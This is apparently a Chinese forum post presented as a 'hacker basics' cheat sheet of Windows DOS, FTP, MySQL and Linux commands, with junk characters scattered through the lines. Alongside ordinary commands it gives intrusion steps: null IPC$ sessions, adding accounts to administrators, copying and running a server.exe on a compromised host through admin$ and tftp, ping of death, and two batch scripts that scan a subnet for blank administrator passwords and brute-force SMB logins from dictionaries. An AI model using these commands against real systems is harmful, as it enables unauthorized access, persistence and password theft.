黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
7 a, |5 R5 j; d9 K' p* tnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
# }0 t  E6 |' Z( ~  ?net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
  ?# ]* {# T& C  S6 {7 K, lnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 2 J4 c# }: g' w% t) L
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
+ [- \& k. U" u( g, Z) _, G* C$ xnet use h: /del 删除映射对方到本地的为H:的映射
5 y5 V9 a4 u' u* \0 N/ j" Z/ Hnet user 用户名　密码　/add 建立用户 6 k! F& C0 H# u1 s" j- n8 e. q" q" Y
net user guest /active:yes 激活guest用户
* O3 Y, g. V" N8 @net user 查看有哪些用户 " ~1 `1 S1 X* K) r- [5 K
net user 帐户名 查看帐户的属性
4 A7 e/ s2 c( l4 S4 mnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 # R0 b8 s4 d- W, c2 y% i# W. E2 d
net start 查看开启了哪些服务 % |: ~0 G7 q6 E
net start 服务名　 开启服务；(如:net start telnet， net start schedule) $ v6 i' a" D, D+ v- a9 A
net stop 服务名 停止某服务
% L2 `- F5 n& J9 Knet time \\目标ip 查看对方时间 6 [6 Y6 d/ W. K
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 3 K1 w* Z  X1 s
net view 查看本地局域网内开启了哪些共享
, ^. O1 l" E! |% L% E- H* F  knet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 . i4 \$ v" D) Q6 H% f) B
net config 显示系统网络设置 * A, x8 N2 R4 h5 [' D" v) }
net logoff 断开连接的共享
6 ], |. f: ^' g, E, P; Z$ Dnet pause 服务名 暂停某服务
3 c9 ^9 G7 t6 C2 Y# v0 `& Tnet send ip "文本信息" 向对方发信息 / D7 _6 ~: r" v. b+ I% T. I5 y0 }
net ver 局域网内正在使用的网络连接类型和信息 * g; e* W" y& ]
net share 查看本地开启的共享
9 l3 O, }; A$ M1 k+ mnet share ipc$ 开启ipc$共享 & l+ j9 U# k4 Z& d
net share ipc$ /del 删除ipc$共享 , @$ j& l% w) A
net share c$ /del 删除C：共享 9 j- J) r) T& _% a* P5 a
net user guest 12345 用guest用户登陆后用将密码改为12345
* {0 J" {0 l. O% P3 R: x8 E6 J" dnet password 密码 更改系统登陆密码
0 n' T& |' U7 T6 j3 w6 G8 gnetstat -a 查看开启了哪些端口,常用netstat -an : U) [- y" v; H0 r, O
netstat -n 查看端口的网络连接情况，常用netstat -an
- c+ Q1 {4 J$ T9 _/ z6 n: R( Vnetstat -v 查看正在进行的工作
1 J( [# ~. e. o; k# xnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
! C9 s0 {0 X8 K7 Bnetstat -s 查看正在使用的所有协议使用情况 + U4 E* G# c; a7 l
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
, u7 F) I& V( ytracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ! b1 M* f# |: x' f
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
3 b9 J) Q# ]( o) lping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
6 o; i3 m+ y3 a" @( t' n3 a( Yipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
1 N) V# A0 d: s" Gtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) . O8 t" y0 \  J& n' }
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) : E- }" C9 G% _$ n& Y4 b2 s7 l- A# j
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 ; U3 J" o& e# u# ]: S3 }% L1 T$ }, Q( z2 M
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
5 G/ T( x; l* O8 U& D( G- Fmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
' c% W7 w9 k+ Z7 c- a9 Ifc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 " L! `$ b" J7 n! ~
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 9 \& H9 ^9 z) G
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 ( }* L2 P4 W; w8 i
at id号 /delete 停止某个已注册的计划任务
: t- Q: ^- h, R+ x* ?% C6 @. sat 查看所有的计划任务
/ e4 W1 k1 ^0 t; j+ F; h  hat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 ( S/ Z7 x5 g3 X1 \+ f
finger username @host 查看最近有哪些用户登陆 ) e( O3 r/ L8 ~$ h7 X6 q( C
telnet ip 端口 远和登陆服务器,默认端口为23
1 t  ^7 e+ v/ J- q) Q; \& C+ t1 e' Gopen ip 连接到IP（属telnet登陆后的命令） # \0 B+ \- _1 y* y
telnet 在本机上直接键入telnet 将进入本机的telnet   t( B6 Y) ?7 e# J6 {# ~
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
# D3 t5 ]5 b7 W3 ~1 v# X1 H- s6 ?copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 2 Q2 D+ |& e, S
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
" w' U8 s+ {/ W) V# K9 fcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： 9 M% b% P, u6 M; f* T# i; q: `
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
! b3 G0 R) c4 D, S; ?6 Etftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 # j' `, c) Q% @
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 2 X) v  _0 y8 w) P4 s
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
  ]7 [2 `6 u7 y' e/ O4 q. }# j& ~route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
1 C0 P& \# X( i: A, o' i) X+ karp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 : n( p  ^% Z9 o, a" g' H; M" r
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
& L, X6 q& M% L5 a2 f  ^* j7 J' Zmem 查看cpu使用情况
, x9 x. ?1 W! k7 s- X( Wattrib 文件名(目录名) 查看某文件（目录）的属性 6 q& B+ }* X( X* l+ ~! _/ G$ C
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 $ G  g: D; P5 B# N- u; @4 [
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 6 F; y5 Y' k, p: _9 P) ~  M3 e
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 5 [4 v2 K! e9 C5 H# Q' E
set 指定环境变量名称=要指派给变量的字符 设置环境变量
9 g! X5 b6 u# N, R( T# ?* Cset 显示当前所有的环境变量
4 \1 O2 J. u: hset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 1 X: H3 [1 E( E" ?6 s5 g
pause 暂停批处理程序，并显示出：请按任意键继续....
! Q$ K8 K: r- Fif 在批处理程序中执行条件处理（更多说明见if命令及变量） ; n5 T. i) E( {, b1 ~. M
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） ( p% M! R' C" v: G3 u5 `
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） " a* S: b6 f! x9 L5 Y
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
- f1 o% ?  E3 t2 Y) c+ l$ uecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 $ W. B, c' p& K  x+ d5 N
echo 信息 在屏幕上显示出信息
5 l0 `5 N- v8 A, S% d% hecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
5 P# k  S; w/ O8 ~% H$ d) |findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello . h, x) r, X& i& A* V, v( K; @
find 文件名 查找某文件
& N( F) |$ b# u/ `5 N, K. U0 \0 @; L2 vtitle 标题名字 更改CMD窗口标题名字 ) H: l9 }! ]- m4 t# l
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 6 x+ Q5 z( [( R; Q' ?  O# r5 Z
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) 9 u/ @2 A; {6 j% @9 y
print 文件名 打印文本文件 # w  f6 d. D$ h+ A$ `1 d' o6 d3 y& s
ver 在DOS窗口下显示版本信息 + x+ L: G+ R5 F% T9 A# v- K  g0 Y; m
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） " ^8 C( D+ i4 ]  c+ W
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS ; U: w2 h+ ~% M: i, O9 R3 O$ p
md　目录名 创建目录
3 l8 r& v+ B8 X) ~/ m8 a- H* Greplace 源文件　要替换文件的目录 替换文件
" ?5 g, g; W6 K" k' S9 uren 原文件名　新文件名 重命名文件名
8 s$ w) m2 f: A' Wtree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
" {4 m) s9 A# ]! Q1 e' D) O* ctype 文件名 显示文本文件的内容
8 n8 q# K' b5 P, W3 h" b" qmore 文件名 逐屏显示输出文件 4 h. R3 L9 P. ]6 `
doskey 要锁定的命令＝字符! z( D$ F& \. ]3 C8 c
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=   p% j3 ~$ E6 L1 ~# x6 W
taskmgr 调出任务管理器 # f& J; ?# m- Y
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
2 X+ R$ A) k) @tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
% e+ t! g! w4 h' l4 Sexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
3 f( V5 g1 ?* h2 o% \) I" wpath 路径\可执行文件的文件名 为可执行文件设置一个路径。 8 z& D2 q9 h5 O* n9 @. j
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ' k( |. W& B; V1 o. l2 r
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
2 i3 b0 i/ |8 u" a  ~regedit /e 注册表文件名 导出注册表 ( m) k  R7 A! D  P
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 ! ]9 x- ?  x3 G+ o! _4 c7 Q* n
cacls 文件名 查看文件的访问用户权限列表
4 R8 Q" {6 E1 q& L; T4 O* C# GREM 文本内容 在批处理文件中添加注解
( q0 H4 _+ m2 Znetsh 查看或更改本地网络配置情况
; O3 A& J0 N6 q+ m" ^IIS服务命令：9 x5 S, U5 |  j% D! s8 ^
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） 1 e/ q8 M0 q( k
iisreset /start或stop 启动（停止）所有Internet服务 , [; C1 Y2 U/ s- L$ }
iisreset /restart 停止然后重新启动所有Internet服务 2 L3 P* |1 j7 S4 q" X
iisreset /status 显示所有Internet服务状态
. n3 C" {8 Z, B* K" w  p" Y8 Uiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
4 f2 i! k4 N' s/ d2 }4 Ciisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 ' U. f, p1 o: g  B4 l- x# s/ A0 g
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
$ A8 I: c1 x$ e5 Uiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 7 }  i! W. z9 s
FTP 命令： (后面有详细说明内容) " j% t, z2 I4 J$ v! d. b2 w+ b7 A' I
ftp的命令行格式为:4 Q+ x, g$ ?  q% L8 T2 m4 J
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
& ]/ M9 X& h" A+ Q－d 使用调试方式。
% Z# N# R$ c9 }+ P－n 限制ftp的自动登录,即不使用.netrc文件。+ r/ f+ z$ n0 T8 \, I. \
－g 取消全局文件名。 & @& i* \1 Y% C/ @/ T- g, Z. d
help [命令] 或 ？[命令] 查看命令说明
  Z4 N! q, C/ Q" m9 c, abye 或 quit 终止主机FTP进程,并退出FTP管理方式. / I8 V0 s* y0 e0 |  O- {2 X$ J# V
pwd 列出当前远端主机目录 & I% J, v. C8 e1 o# _
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 " H& [0 S4 y( s7 Z, H1 I8 N3 q
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 . c/ J+ d- N$ G( p6 P
mget [remote-files] 从远端主机接收一批文件至本地主机 . \; y: e5 @* t5 r
mput local-files 将本地主机中一批文件传送至远端主机 9 [( `/ d) T& P* Z5 a: J8 m
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 $ G* e0 B" z- q! U/ u
ascii 设定以ASCII方式传送文件(缺省值)
/ y2 K9 f$ f; N6 W; ?6 ?bin 或 image 设定以二进制方式传送文件 2 t  V1 r( d! d4 `- _; L
bell 每完成一次文件传送,报警提示 ; B1 k+ X: c( h1 |) p& P( I
cdup 返回上一级目录
8 U* t( t1 w1 t% vclose 中断与远程服务器的ftp会话(与open对应) ( @4 U9 D9 l2 ~
open host[port] 建立指定ftp服务器连接,可指定连接端口
- N: J/ Y5 s! m  B. l& D  o0 xdelete 删除远端主机中的文件
8 A8 K, I, ?2 Z4 c2 W- Ymdelete [remote-files] 删除一批文件
6 D; s, N# l7 k) r& a: Fmkdir directory-name 在远端主机中建立目录
4 p1 w0 U/ a" c3 Arename [from] [to] 改变远端主机中的文件名
: G/ U( O+ k4 c, }* frmdir directory-name 删除远端主机中的目录
: w5 T% v( I6 a. u0 ]- ?status 显示当前FTP的状态 & i/ e1 q# n. E. w$ }
system 显示远端主机系统类型
$ R" c& J, x, ]6 Y; [2 \user user-name [password] [account] 重新以别的用户名登录远端主机 " \% f+ Z9 C& K
open host [port] 重新建立一个新的连接
6 i/ z0 s+ M, w3 Z+ Xprompt 交互提示模式
" G9 y6 A+ f+ _9 K% rmacdef 定义宏命令
% y8 o, h# `2 k$ l9 M1 @lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 , E' I. X% {7 n# ^5 {# O
chmod 改变远端主机的文件权限 ! g* D3 a% T0 n' e' g5 c
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 - |/ N0 ]% M) Z( e' D4 Z
cd remote－dir 进入远程主机目录
2 m4 Q7 ?2 G5 C% Y) o' Vcdup 进入远程主机目录的父目录
) y3 n, }: X& g; a# y+ Y! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
- r: N; |5 g0 m4 h8 E( u/ G7 A/ RMYSQL 命令：
% J: F7 K( H% h' j+ K; M8 {mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
" b( s/ o3 F9 ]' s  m7 D（例：mysql -h110.110.110.110 -Uroot -P123456
; r/ y- B$ B3 f9 D1 ]8 Q$ E& g注:u与root可以不用加空格，其它也一样） 7 M& k* q  ]$ t8 j
exit 退出MYSQL . P9 `7 u  _" t1 v2 {$ v$ E' }
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
- e2 k' @8 A, W. Z' u; v$ kgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） ' c8 x& z! j$ m
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
; F: ~0 P$ w9 X: H( L* ~" w: @# uuse mysql；
; g9 h$ T1 u! B- ]: ?7 Ishow tables; 显示库中的数据表
% D) Q6 h% d' k/ E1 s; _' Bdescribe 表名; 显示数据表的结构
) T4 P" Y' `8 n5 dcreate database 库名; 建库
4 |0 _1 ^- w& }use 库名；
4 B; U5 g8 Q+ g: [. ?, k5 bcreate table 表名 (字段设定列表)； 建表
, Z/ g) c* c8 adrop database 库名;
. K# T4 m4 l- f8 S- _2 ydrop table 表名； 删库和删表
; [0 ~- t) y. W5 J, A: tdelete from 表名; 将表中记录清空 0 A! r: ?) g% A) i0 c+ x' S! k
select * from 表名; 显示表中的记录
" X  n' {$ @1 ]9 smysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
% h# V) I4 m1 Y6 Swin2003系统下新增命令（实用部份）： 1 _+ L; Q8 }8 [! D
shutdown /参数 关闭或重启本地或远程主机。; e' @, J' u2 u! r( J6 [5 {/ n
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。2 J# ^' l2 n/ b+ Y$ |
例：shutdown /r /t 0 立即重启本地主机（无延时）
! G) p) z* C  s' F, O4 I0 [' i. mtaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。; b" p& F+ z; g5 F7 ^
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
: B$ h" U9 L' q8 l, e& V  ztasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
( O# f0 E0 L& D参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
$ u, G" |2 J1 t4 M# A* U8 zLinux系统下基本命令： 要区分大小写
5 B6 R* a- @1 h( p; D3 @# s  runame 显示版本信息（同win2K的 ver） , ?% ?& _# e7 O1 D  O5 {
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
& K8 q; ~; I9 h; y2 hpwd 查询当前所在的目录位置
% W5 S6 i# D3 w- xcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
/ _2 R. f9 N2 k: Y0 i3 \, y  ccat 文件名 查看文件内容 0 H" A, J0 x' [) U1 \
cat >abc.txt 往abc.txt文件中写上内容。
4 O0 `4 ]: h5 L; U, F0 umore 文件名 以一页一页的方式显示一个文本文件。
  Q' C  _+ E. j- g  k* ~cp 复制文件
) k. f" e, l; c( T) S& O/ p5 z4 umv 移动文件
0 e" s6 C, _0 i* [; Lrm 文件名 删除文件，rm -a 目录名删除目录及子目录 3 {) G9 X7 R1 ~. y7 S
mkdir 目录名 建立目录
( g4 o4 r9 E3 J) @rmdir 删除子目录，目录内没有文档。 ' }' L2 ?( ~+ v0 C6 ~# ~  d; z* ]) G
chmod 设定档案或目录的存取权限
/ k4 \6 T, q! G# C9 O% }grep 在档案中查找字符串
& v+ h' P, {; O: m0 ^" k, Vdiff 档案文件比较 - `4 e; Y& B! t2 E0 p3 K; `
find 档案搜寻 - L) e/ n7 _1 J& e
date 现在的日期、时间
* G/ a5 ~- [+ ^9 \3 Vwho 查询目前和你使用同一台机器的人以及Login时间地点
; x, e$ F$ g' j  yw 查询目前上机者的详细资料 . g. `: I; n% E5 a3 n3 g
whoami 查看自己的帐号名称 2 x5 Z  e6 m6 b& U" X0 g) g9 X
groups 查看某人的Group
6 _: g& E% i. @! e) ]" [passwd 更改密码 7 O, j' m9 j, a8 g
history 查看自己下过的命令 $ X" S0 j: D- a3 i' g- f8 r9 ?8 [
ps 显示进程状态 " Q! @' R. G' t( w7 y/ w  W' `
kill 停止某进程
/ u$ a0 K5 t- B/ Egcc 黑客通常用它来编译C语言写的文件 - A  d3 a" |- V5 g
su 权限转换为指定使用者 & R' |+ X+ p7 l& |
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 + \2 j" w. I5 ^5 I1 k
ftp ftp连接上某服务器（同win2K; _0 m, d2 @* H
附：批处理命令与变量
0 t$ M8 H$ {2 p; C* ^1：for命令及变量 基本格式：
7 F2 `9 b# _2 t9 p3 e, t% N0 pFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
; k, ?* E7 \3 t+ P7 g批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
5 O( _  a% K# @9 Y" w(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
; K0 H& [' D* ?$ G! g! tcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开$ H2 V% U5 B; Z$ S2 Z
command_parameters：为特定命令指定参数或命令行开关
5 {1 ], I( a9 `; J+ p+ U- G3 I0 l9 CIN (set)：指在(set)中取值；DO command ：指执行command
6 X2 L8 O: N  A) Y; ~7 V参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
+ M8 Y3 F2 m# r& @% b6 n) U9 R用法举例： 1 X1 {: ~$ r; X: v) J
@echo off
7 a. S# o3 t' ^echo 用法格式：test.bat *.*.* > test.txt
" d' y8 d7 D  p; V4 E8 L! gfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
+ J+ e5 w1 \2 V, m: H2 y2 U存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。7 @* B. ?: h4 ?7 _% {# x$ B
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
4 D( D9 m* ^; P8 H5 u5 u@echo off
2 b" K+ J" O& |! y: P2 hecho 用法格式：ok.bat ip
- f2 s1 E, h- u' D! aFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 : F; A/ {$ A! K" x' e" X2 U, q
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
. w6 y- L$ h+ ]* C1 T2：if命令及变量 基本格式：
1 r" Y/ T6 a- h' G5 [. |" P9 M# SIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
& C# [- [: Q' D4 W4 J例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。( P- B4 G7 d# f! x# t0 f2 N
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
- P" ~- t4 o3 G' i- ]4 CIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
  j+ ]( A& |% n0 E' I例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 1 }5 O9 g$ _$ Q" ?* b: j: r3 u
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
$ x2 o% |* ]' y, c9 L% R例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 & P7 z, @% n! P* Y
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”